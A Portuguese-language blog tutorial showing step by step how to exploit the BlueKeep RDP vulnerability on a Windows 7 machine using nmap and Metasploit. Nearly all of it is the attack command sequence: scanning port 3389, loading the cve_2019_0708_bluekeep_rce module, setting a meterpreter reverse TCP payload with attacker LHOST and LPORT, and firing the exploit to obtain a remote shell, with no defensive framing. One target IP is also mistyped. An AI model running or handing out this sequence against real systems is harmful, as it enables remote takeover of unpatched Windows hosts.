BlueKeep – Exploit Windows (RDP Vulnerabilidade) Remotely

Remote desktop protocol (RDP) é um protocolo de comunicação de rede seguro projetado para gerenciamento remoto, bem como para acesso remoto a desktops virtuais, aplicativos e um servidor de terminal RDP.

RDP permite aos administradores de rede diagnosticar e resolver remotamente os problemas que os assinantes individuais encontram. O RDP está disponível para a maioria das versões do sistema operacional Windows. O RDP para Apple macOS também é uma opção. Uma versão de código aberto também está disponível.

Mas o RDP tem uma vulnerabilidade no Windows7, por isso vamos demonstrar isso hoje. Então vamos abrir um prompt de comando e começar.

RDP roda na porta 3389 TCP, então primeiro vamos precisar ver se o dispositivo que estamos atacando usa este protocolo. Para isso vamos usar o nmap e especificar a porta 3389 no nosso scan. Tudo o que vamos precisar é o IP da máquina Windows7. O nosso neste caso é 192.168.100.84.

nmap -sV -p 3389 192.168.100.84

O comando acima irá scanear, olhando especificamente para ver se a porta 3389 está em uso, podemos ver o flag -p denota a porta. Então vamos ver os resultados do scan.

bk1.PNG

Como podemos ver, a nossa caixa Windows7 usa de facto a porta 3389. Agora vamos avançar com a exploração. Primeiro, vamos precisar de abrir o Metasploit.

msfconsole

Próximo vamos procurar o exploit que procuramos, no nosso caso, Bluekeep.

search bluekeep

bk2.PNG

Então aqui podemos ver dois exploits, ambos para o Bluekeep, mas só vamos precisar do de baixo. Então vamos usar isso.

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

bk3

Após podermos ver o exploit em vermelho, sabemos que estamos agora a usá-lo. Então vamos procurar mais informações sobre este exploit.

info

bk4

Então ele nos dá uma explicação de como este exploit é capaz de lidar inadequadamente com os binds para obter a execução do código. Perfeito. A seguir precisaremos dizer ao Metasploit o IP da máquina alvo do Windows7.

set RHOSTS 109.168.100.84

bk5.PNG

A partir daí podemos ir em frente e dar-lhe a carga útil que queremos usar, juntamente com o exploit, para obter uma shell TCP inversa.

set payload windows/x64/meterpreter/reverse_tcp

Então estamos especificando o sistema operacional Windows, a arquitetura 64 bit e pedindo uma shell TCP reversa com uma sessão Meterpreter. Mais algumas coisas que precisamos fazer é dar ao Metasploit o IP e o número da porta da nossa máquina atacante para ouvir em.

set LHOST 192.168.100.237set LPORT 4444

bk7

Estamos especificando a porta 4444 para ouvir simplesmente porque sabemos que não há nenhum outro serviço rodando nessa porta. Então agora queremos ver que opção de alvo o Metasploit nos dá.

show targets

bk8

Já sabemos pelo nosso scan nmap mais cedo que a caixa do Windows7 está a correr no VMWare, Virtualbox para ser preciso, por isso vamos escolher o número 2 na lista.

set target 2

bk9

Se você tiver tudo isso configurado, o passo final é explorar a máquina alvo.

exploit

bk10.PNG

Vemos que o exploit está tentando funcionar. Também podemos ver que ele nos diz que o alvo é vulnerável. Este exploit deve levar apenas um minuto para o código ser executado.

bk11

BOOM!! temos uma concha Meterpreter da máquina alvo!! É assim que o Bluekeep funciona.

Obrigado por ler caras, por favor volte para mais posts como este e nos dê sugestões sobre o que você gostaria que escrevêssemos.

Também, não se esqueça de assinar, compartilhar e gostar, obrigado de antemão!!

Deixe uma resposta

O seu endereço de email não será publicado.